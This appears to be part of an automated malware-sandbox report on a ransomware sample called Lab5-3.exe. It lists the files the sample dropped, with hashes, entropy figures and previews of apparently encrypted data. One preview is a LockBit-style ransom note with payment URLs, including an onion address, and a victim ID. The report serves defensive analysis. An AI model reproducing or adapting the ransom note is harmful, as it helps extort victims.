                                                                                                          Preview:..[.94r.=.....7.m^.D..h...=f....o.....).sM..........U..].....7.~g.y!..!.z"$.......i.x..j.2.1F^....H.y$.....YdL..B..b..8.)..../2.Y-.S.|_K.q........h{....6.=....a\....C..yv.s..f=.H.!O....9. h.\.p..;...{...X\.9..L...o...%.|L,.O.n"5. :..$......w.(.2..........9&.....zm....@.(..K..&....o./...X`I.(..h.R.g...B.._<.$F..`T..._.`...@P...}..J......a ....2..[.....6..g...j._.U...#..s..?c .!..br.9..>#p^..0hCa.....3!.....*..}E*...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.904439643207007
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uNYwAlRpqXslrfWlsHfUTid3hBaUoSGFcmeykEdEElU92i:GY5l+slixGx0uKeY2ElUJ
                                                                                                          MD5:554D25D19A05859317F048177B2508F3
                                                                                                          SHA1:F996E530EF1F7E25786AC93B07CFEB9BB6994D5A
                                                                                                          SHA-256:74249A735D0AE6A103142D035A49744FEA01DFD8574DB1E07EC16EDC67F755D1
                                                                                                          SHA-512:822657A7E482655B56076639246D568ED5629432A59BEC5915892AA4292A60D793D035549482459E59A74CB3E5C186CC5F1EFB3F16DFF181D27EC1D6620EE02D
                                                                                                          Malicious:false
                                                                                                          Preview:!.<.e.q%..."A.y..q...Q..3..HT.#.....*;.....fA.q..Pq.0..A*....~T....:...}Y.."..............]%!.}&........ C.F.#.y...x{.....=.V.+'.*r.......\)`3!o.S.)+e...K~.q..}aa..>...0A...1..c3.*.6......KN..Fq.....9;....z.Y._c*b(..."{..F..+...(._..G5...|O..._..[....r.P.LL.rxY....x...=s...+....d.a.......k.}Z......e.0C.P...5.&.{.^DK.S.>7^=...Xj.D....|L..\.,.:.&...*..<C....j.k.'V..1............(.....Bl.S=..5.<g.p9.(.z.tr<h....;.s.b..v.b........P...k+\u...5.+..vQ#..Wg.J.w4.Oc|V...F...~...%%.s....m..o...!...[..O.D....PZ..&..n.1..o..X.s].W>Y.E....+MW.b-M.....'$.8Y....).?.*..........h.c..k%zD.m>K..+9f.]:"..X...pyf...@.{A;z2v>dA8....C@4...P...V~P..W..0.[..u..wwok.....X.j#vv>.a....#.z..<...G..!+....q:...TH...N.....%P...x./e.^..........2}.gA..S..j..M.k....=q.}Iic...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.909842000590575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LConqgOnSlN4ohy63nn4BNbxHfUTid3hBaUoSGFcmeykEdEElU92i:+obsbCkOGx0uKeY2ElUJ
                                                                                                          MD5:BA3F3E56228209F439674247DD26D323
                                                                                                          SHA1:687B2B71C4D32E2DCCE0D18956F2954C06B0994F
                                                                                                          SHA-256:F75D2858BD1E5979FB57C146531E9F680C3E2C105B89FCA72E81EF487C4E7346
                                                                                                          SHA-512:D293ECDF0259EDCCEB891C89939D2E1EEFFB2A28324E69CC54E9248C9FA169B2D65C86615DB0035257387F0A4341EF2846FB924CEFEA3FC6E7AA9187FE65E394
                                                                                                          Malicious:false
                                                                                                          Preview:WY3..a${..i..)L5.?.W..D..n,j..j..D...b%$^....b.H..Y...D..;.r...j...S.fC...\z.A.%.!6.:.m.....s.].2iq.V...PP......7$...9.m.2.......;./.^Z....dp.-.#..K.G[..^|..)...r...qm....2qST....!......5.W..h.Z.g...V....*.@.f.c.Pq......1...j`. .^p.3..%...C-#....,}....iQ...H....A_..1.D.....<.H.tR..!.2o../).r6.K.B....9xF.kEb.$V..g...2.j...g........3..W.....E*D.....JA2./7............Qc.B...S[-.o...;.s.`2pZ...)i.....B..x.{..vY....uu.....f}.....jr..K....(.a..;I..E...!5Gx:......F.%o..c....C2 ...&..._.....`\O....y..0..(RHCU....~.w.............E.y\L.6.D....{.jh_...................'d..~.........\...Q1A...l]..\......k..y+d....QS../'..(AO"..^.w..:!...E..Pd.j.3Z.eqp<.Z....,VC.emS...l....GD..Q...T....r..z...9....|<........2.....*j.2Z....!!.SX.......lJ.8g.3....8.e.#Y1K.._.0.t9?.5.y.-Z........Q.M;...pb....^...g..-.u}...F= $G.E.X.#.6.4..fe.Ht<<....L.._ERp.).R..jF-C.O.9.#.........L.%.G.).bO..V.q..A.C.?..n|.8...$....G....h%xr&..k..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.909200526218766
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tVHqgxo0Yg9cHlXNDHfUTid3hBaUoSGFcmeykEdEElU92i:rQjg9aKGx0uKeY2ElUJ
                                                                                                          MD5:604A9CA0D5CF94961C662A116BABF17D
                                                                                                          SHA1:61192670633247D30C62329D453DAC5F069FB20A
                                                                                                          SHA-256:ED801C251F77CF70F88C6691BCB2D7E6A9A03495601F68360E5754F22926B24E
                                                                                                          SHA-512:DF399BAB30F41FAE2683B4AF1866F08FC75E4324B2DFF53403802F4BEDCE72A1FBCDE8665A483DAFED63892D798E59F41D60A6AA1E34A4AF4108D61BFB2215ED
                                                                                                          Malicious:false
                                                                                                          Preview:x..S.8k`...ju.T.8....#..]I..o..l.T.tW..=i..i.|....>U.a;.F..bv]....r...=&%._...0e.,..v.T.....;..>..Q..'is.s.Y.^U...5.Q....@..f.WG....v....PFn.;..f..c.E%*t.O.......+.5..7.?.!....H...I.......2.Jy`..n..,L..6.}..$.b.sa..adM......e...c:.N;.7j.;..E.L!...S_.s..A..e.{zI31.b.5...U../...f6R...p.\#. .lC.<.....g....C)....}j?%D,..'. '..'..H....9o.H+E...m.`.!C.}....|o.Q........5....dD..I...E..y...*Up....cj.h.{m0Q..W:.g|R.`....s.'p.pW. .Nt{..mt....`-..`.j.*.?....uz...W*..-.6.a..p.\...J.O..}N...L..n.5c..*a]..D^.h...ZV....9V5O.>..b.B.C.wr.%V..ieD'v?[;.Jy...............#..|..C..9..Q......=...........Z..........T2..w.....^.%u<..."v....H;f<..f..|..F.F...q.G...3...b.L..U.l..;W.<...k.VB7'+............Z.........)....m.uA.D..Yh.n.....U.E...E.N.s..4`.....|BQ.5........./........*8..../.......^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1920
                                                                                                          Entropy (8bit):7.900657009424998
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XAx3HI+jhHfUTid3hBaUoSGFcmeykEdEElU92i:w5HI+OGx0uKeY2ElUJ
                                                                                                          MD5:B36B9ED02422DA3A2E1932E4390ED96E
                                                                                                          SHA1:45B06D56309057B195B7F1EDAEB0DC78063FA429
                                                                                                          SHA-256:933179E9496CB50152D954DF240E5F4891356C50F0B2F637EC405D1A5DC0DE66
                                                                                                          SHA-512:C6C45433612755DC455359DAEE7DFB0F92EF0C85C51C7AA876B763347CBC276D1334A47AC302F83784B5D789C317E3CBA5100877A325848C215494E96CCA9382
                                                                                                          Malicious:false
                                                                                                          Preview:.Us#.'.+...2..g.h]|H...V76].V>...1..zjG..n....T...n.b....R.z.H8...Id...,....Oe.7.._^..+.l'.0....b....c....b..~..L.H.r.2.w3L.M)% ....m...w.#....@.w1.z)=D...VI ......4.......KF...V..Nh.WC6.v.>..d.5....w.0 .......U.j..C..3..........Y.`..M4.{;a.r..L..@..<.....6..{...g.....R..*..t.-.....,.4.~..YZ..k...;.s..=A.N..+.}QoE}.p.......|Y.\.%.].~../zT..o.'Uh8....=.........kA.....{i..noe".-..5...GJAR....Mm..q...../,r.uH....<eY5o.^..Q..'.;!`.A....h.c......[.0.._....[......5.........:...>....Y...H.y.9.....%...%..f.{...l.'........{....B....iE.A...eUf.*.b...+..qt.#.u.'.7.>....Aj).)....@....n%.a..=....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2096
                                                                                                          Entropy (8bit):7.912734407505788
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dlcJUdh0jENGO/7w8v8HfUTid3hBaUoSGFcmeykEdEElU92i:d2JsYdOjVTGx0uKeY2ElUJ
                                                                                                          MD5:FFDA512A22B1724261CB502DE3E8BFEA
                                                                                                          SHA1:6714B7FEE2968E68F567BFC1412F621C6CFB9447
                                                                                                          SHA-256:DF9C39B3366ED84BD3D3554B645E873385CD048621ACF2AEE5A437107C677B9C
                                                                                                          SHA-512:5A80483D986FFC2EFA2D75447E535DA4FD6BDB581887FE7DDC0765042A73AFF694038D5CE0494F51B832D4B4C535350BE54642B56DA7BB0480ACFAEDDF67C324
                                                                                                          Malicious:false
                                                                                                          Preview:.l.b3.].Q}m.........g..v7...$........s34.X-..4q-.(.{.i.K.N.^........i.m.ai.......;...vV.8.<.< }....._j..l.Z~.t...N#......,.p.h..6~.un.ml.....-...m..S.-!..4.[.1}..P|.(6.G."......7...UE....1.o...g..Y>...Ta.mi...?.v.{'....&.w..".[\4.C.2.e#1.8}.S$l.x.'.../G.7....&..tZ.......hW....~..9....}J......T..Ce.3.^......t...J.L:8.........^7.tS.u.6x...`5..7.....;.Z....B....PM?W....TJ[dk..5..}. .....i.....U.2....# .H(...6.,`.ZU....y"...RrG.]/5%V6.l2.:..H'G...#t.\pJ(v...wo|.d6.oG..uQ...>.ZX 3....oT.....i...ah.......^.8.0...T..eAO./u7...(.Q7...9..&~..9R7F}.c.+..<.....&.*y.Q..=.@....6.&....D. s.*A.S.2...[...%4.......;..e..._.&.....9....F;..i.k....P.Om"..........V....o......&z-h.....1...H4...+.F*.C.6.{.M..............".'....c..w./..7.....=..c..2....Y$<...F.+.@o4.*\..V&..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1936
                                                                                                          Entropy (8bit):7.903487976077529
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZHl98LP7ptHfUTid3hBaUoSGFcmeykEdEElU92i:ZFKr1GGx0uKeY2ElUJ
                                                                                                          MD5:65BDB7AF1D4A5C09A5B4243D697A9451
                                                                                                          SHA1:F09EF7146431CDB36549AEAB955D99ECCFA1F61D
                                                                                                          SHA-256:9DB78887E423D1F6355E8DA965BC94A212DF9F55FF15187F51E9548A4AABF657
                                                                                                          SHA-512:A13AB704523626999F6531E72E9B44AB233F012B1B7F4304E583FA22E223A23F741B41E695AD707CA8DD54E079948DBD2EF1E88887B3195415968AC77F43B7F5
                                                                                                          Malicious:false
                                                                                                          Preview:...s.v.:.....g*.W..F..,.}).OU..f.Y..:.....3].G..w1m.`=.TY.w`.c..Y..kw..-....KS?....xu.....u....g5....j_`......{...~...;m.......X.E.Q....|b..9D...Me.9...?..>..Y...5q.../.../.Q..".S..)M#..Z,...T..I. .`!.N...H+..w....1..^...r~NYi....../...:J=e:.D..+.%...u..Z.H......Q)%.S...`... .._......../.....Gp....Fj.....vZ..X.*b.p..j>b.p<M.L..&.>........Q.1.....`....4r?.<.X.z.!.....99W..L7`...k......\.*....`gQ.s...^.J-<....s4....b..Q.....#.Ir.X.Z..%..*..n...\.=....1r..{w...s..#6...~.......}.Z...W.6.3.......Q.e.$.`......+....G.].s..,..O.o.?..D...x..."..R.~`.....<v..E.w.1c*O..<..:........6..4...X.~8u.....N....8......u.)o...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1968
                                                                                                          Entropy (8bit):7.904371362610579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0j6VDrTYHfUTid3hBaUoSGFcmeykEdEElU92i:0j2HT/Gx0uKeY2ElUJ
                                                                                                          MD5:3484D5214BAEFCEFEB89CE2602F04282
                                                                                                          SHA1:BBD5FEA9EC11DEC8D996E55B88EFCE39E1011419
                                                                                                          SHA-256:0DE2237D0E18AE483B1C8FDFA7B1889548835BC2E3C873339E9B02339465D2DD
                                                                                                          SHA-512:8B76D7758717DDA6505B9BF97ABDFBA4832E1A7BD0819F65F508CE36A1B67DBC0C46667C3B043F6906132C46D01A7D631B2CBE39553AE4E7F0D65DBCE7589263
                                                                                                          Malicious:false
                                                                                                          Preview:"..s....a.s..c..^.v....;..F8yx..!........J...W7,..L.......<>O.v.G.r`.A..Y.....G.A..\..)..n.7.v.'F4.x[y.J..Nfv'.p..~J..T..2g!..]}..>..pf3..8X|..8_>#...~...f..C0v...Y.:.^tk.Z..g.&5B.P.eMz....$O;.w0.. ...ru...t.e.<quSE..S.#n...Jg|...>.....!..U&[.@-/....d....f.$...|..#.q.)..H.3[Q1I..TG.u..Sw.?..6..|[Y5#.D...../..Qa.!.BAO..r.$p.......FR.7.R.6P.#.....).....4o.L.l..o...U..(v..=.A....L@...,.$.(C!.5..I.{.A.."..t.fh[...A. ..d....Q.!$..Q....48..z/..9.:.6Io.......J..S.(........t..W..o.p.#O<8..$..'Sa....{?.#... .~.X$.....>.g..\.ll........ $.5^.c2/......A...S..)U.V4..b.....Z&....r.x.....L...n=...V,..S2..tX~z..0 ....8.\)......{....[......E..#[~...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2032
                                                                                                          Entropy (8bit):7.9088139799470385
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FVpi2lgYphi7916krHfUTid3hBaUoSGFcmeykEdEElU92i:FLiW+9Qk4Gx0uKeY2ElUJ
                                                                                                          MD5:B828C1F5E81F40D5598561D3BDC282AE
                                                                                                          SHA1:3994CB010BC9F74B00EDD3B7757CCA6F69DD059F
                                                                                                          SHA-256:E3548260F32E107C808CBA0CA18BEA6882CFA21A6BB7F602615E364FA2341977
                                                                                                          SHA-512:AC34BE569E77D58829F1DA595BC52FCD6662DBE0F302662A7F10EF6DA68E756C58F89DE99E421B4DFBEE045C96610946E2BB1DC8E827E23E96A82785249B4D96
                                                                                                          Malicious:false
                                                                                                          Preview:...j..PH~..n.......N,.ZHs...1...=..v.8.uqU)D..y.lv5..+..?..a.9L|fT...z.f.wC.n.I.!,.dG..#....-).w(+...+..i%0M....13l.8..uV.z.8..\bC\...C:.....C..!+T.V@.Wa.Z*MW.n........:Z..1..7..2..8..k.H....d....9w.n.4y...*?.........Vh.4.+.3.?9..1f...,Ga-...#......C..l*.G_/*.....5.j.......'.........7.".+E..n..2.BH6Z..vX@.d..W.....2.N.Gg.p...3.......X...(..5.<....t4H.....V53 ........w..4....lNg.g..kV..%m!..z.9.o......RF)."...t..R".,....}...X.....#.!........[.\*'s....#...7..._.R......dbG95N>.;...,4..Z.<.-.Y...:'...YY.Q..T..v..X..V.........\{.H..v.M..e...Z...k...u.I6wUx^....IR.>..Fo...Pb.)C.......1...j..k.).B..6.r..........|)....t$....+........W\..Mj..X..!..b..;.S.."..yb..Y@.".R.F5.w.......K...%c..a.?.4.!....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.8906012190907395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:CtguecsoHfUTid3hBaUoSGFcmeykEdEElU92i:CgcsPGx0uKeY2ElUJ
                                                                                                          MD5:D52659AEF0EE063C3FF860E0624F8CF4
                                                                                                          SHA1:8D7C152BED0F4A66C8E1D70FE8274D6E57530091
                                                                                                          SHA-256:CE8C27883C1FCF2794529880360A1412ECE59747022528614800524D36698CE0
                                                                                                          SHA-512:84419A8FDEDA05F8DB42DE55DA3F79981FD3CC5B1BE6BC90B8D9DAB83993D83EE8E3BB5959ACC7C9A66492102DAD59D312F4CBCC8AF65EADB6B7F50091AFF55B
                                                                                                          Malicious:false
                                                                                                          Preview:...E"p......Z.i...a.nl..........[....8(........S)y...).3.S....<1..U..~;.(..s.X.Ao./}^8".y..zx.b.N}..`...is...$3...=.8kG\......w".P.../.v.,.......(..}.';..?Ow/.I.(.2*GXH(...IiA.J...'s. .y. .n...9WU...uO...A.4..\.Iq...<C.K.{b..B...#3...U.hMO.f.......K..a......cW.-Y.?.1..`.P...H.p.......-.:6.. xN.9b1...o..:.?.h..........J'YR3.........Uv...;F0x.(..............6Q15.:...W5...@.....8..k..0.)....D....n......`l:...9}M.b..|'...l<.mr]%ui.|.O..8.b.4)k.r...z..Vu.!........).1..Q....e9Z...JC.2..0.......e.h./../..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1728
                                                                                                          Entropy (8bit):7.891757209392456
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:T52usR3EgYHfUTid3hBaUoSGFcmeykEdEElU92i:TAjeg/Gx0uKeY2ElUJ
                                                                                                          MD5:769592AA33D4577FBDEFDEE792E0F96F
                                                                                                          SHA1:F27DDE5530881A3015ED8C1973581439A601F38F
                                                                                                          SHA-256:46C732ACF5C3B05E2F259D0FB2822A3887A615AD48FF00BE94C680E3DAD0714D
                                                                                                          SHA-512:B0371129D3C95B48D58916B30D3F67531F66C4B84F989CE7186E8D8DFB64709D0961B64BC69914BE935ED4E19B67ACE05EEDFF491BDDD1A85DC11CD5901AED25
                                                                                                          Malicious:false
                                                                                                          Preview:@......x.3.N.;L.....l.I........^.......FA.y...=....w[...&/...H..k..D.?o...)...%b.W.D.3.......|lOg.Zo.u.,._...b...E((..../@.-..8.tf...........#...>.kA,z..=....!*pq._)....7.`s?$2......[:....;..`0.J6BH#z.u$....F.W\a.g.P....@..6,>......=../....?...L.+.D...Y...`.n.[.:..`...B..[.V._j......D.....4.z.....0j1..>..A...EC..H....#..2J2.B..v....._t...v..(*...h.u.X....P..q....e.STi.3]...<.7W0 t.}.i..<6...F.....t...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.911533930224081
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J6QqJ2altYxTsIL4HfUTid3hBaUoSGFcmeykEdEElU92i:J6lATsWfGx0uKeY2ElUJ
                                                                                                          MD5:1C719617DEC76261759E65EEF5C3DD19
                                                                                                          SHA1:B9FD8328DC9D8D68D1FFB8A519C5EA5D393ADBBA
                                                                                                          SHA-256:4F663F82A5525D8195A98D625BE63071E0C3DBB5308A0B7B81CACCA1F27DB69B
                                                                                                          SHA-512:3870AE0F3DFEE45B171132B29AC75CF4E00AE74ED38FD58D491B63AC76C361A277C055D8C671FEB82C363C60D2C9D647E138E94B0BEC22F2C41D2D596F106241
                                                                                                          Malicious:false
                                                                                                          Preview:.......f9j....8G-qA..P..V.i.$..nU..w;.fH..,..!7..L.4.t..]j..71...%..#[.......M(.....~%..._p...6..>.....l.o..R(........V..j.m.`..h....6....6....w....]6.p....VT...4..b.......0..!.8.#.5.....@.x..jcZ.r.(g....?8..s...l..v..[.{.y$...b.....s.:....N...=e.h...LJ.y"h..".`.).e3.Y.......'9....6Z......TO.p...}.-......s..ns.l.P.xg.x.c......1.$....uzb...ztS...8X.Q...^..%I...E..G....sl.d.v".........!VT....C..j..M...a.>.a-.].D...E$...O.-A...wz..J#...0. ,...D.06h.FU...R#.d.;.....k.cb...ZP..O....mO.6...@"q].3.:.7..p..u.9.Mr.. X8..0.._...7..'.?...n.X.J8.h.p(...(L..-_.9..V.LP.....w......%.4..S.:.,...^.L..$+..y_.b'....x..pP..xm_B.yPd..".S.3hi.-.xSe.Q..o(K..6..9.}s.E.....}.F. ...+.......6IVAW..k.W.g..]d...o.k.j.........> ....z..(....p.=...mW.Mk...oG.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.924286394901953
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Ln0r4/EsPguHfUTid3hBaUoSGFcmeykEdEElU92i:Lndcy+Gx0uKeY2ElUJ
                                                                                                          MD5:3F9EB6CE98B6A4EE828294891812F874
                                                                                                          SHA1:8DB9FB12CA82D32535664250C0FB12B2F78E750A
                                                                                                          SHA-256:FD482FF425690E03BC6F23BA8D9BA94C696492D2F37C06E81B2DE761E0419557
                                                                                                          SHA-512:59862D1FB3C7B03D092BDA01C07557BD1A1BFDC21AB38D5D3817C8D0DFC5FA8BCCC4E30FD28F92E177870FDA4415B85B97AC9B80323FD2FF795736459345B421
                                                                                                          Malicious:false
                                                                                                          Preview:..TU..qq..`Z...7..v.;p|$.o8...5V.........U...5.o....B.E..8....s.4...q....N.p.p.Z......8..@.....'.^...J..| j..9m...:.x....T@...{.../=P..r..xl..q(.s...WAwW\/.D..j..N.......NJ.....a..;.,G.y.>....F.P\.......>(..\m.z.}2.."..F.\.m...{..V..r..ZC.#.'..A.I}.....a-^.3=Y..b.b.4...o.N..Y..D......w....c.u....r$.M1...%...Mg....P....+k+0[=..v.Es8..*...J-.....M.}...k...`.f....a.:"\...|.(A..r..{...D..3P.z%).....D., x..H..8.......`.8x7D...9..1t.....Q..U!...1....D.6Y....[....Cc.4b.........w?{B.kd....~..B...I.......zB]....!6sX..x.......dn.q.....81..x|3.Q.s....H.>'...%N..3..>.U...v...h..J#P>..o.0..@.[./....#..>.....lN@..&....M".h..u...%,....n6G....#..}u..c%.8....S....Oy.*....LO....e....H.i.......`.......5....70...i..p.=......P#....{..7.......3.Fc....c{...KvV.60..\...7....Z.c..F..Z.r.,..lk....=..8...!.pp..:.4..%.L....z..g;...F..)..R..&O............b!..._..2..R`.V7.>.....]m\..t.o..0A.b.?I..0.>gy_..ml...P8...Ew.`.x..?.l..6Q......^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.9190796980864135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:l4OHdEd1a0ctcumblmNHfUTid3hBaUoSGFcmeykEdEElU92i:OOHavLc7mhmmGx0uKeY2ElUJ
                                                                                                          MD5:C212DEF581756380A082899DECE5869F
                                                                                                          SHA1:35F4E61BB59544768CE850696954B9F54AE4C0E6
                                                                                                          SHA-256:DF818C3993EB82F837B43436915AFDE3AE579D4B11B3EB7057AE4FC74F75158B
                                                                                                          SHA-512:C33A13A487E8E930E5FB2F0E81CA0E4B0B81BD8ACE1ACFE7290C4FA5F263332B50CD8384F16E2512CE8A25B7FCD098F761BC906F8E8C51689568729F2D87A1E2
                                                                                                          Malicious:false
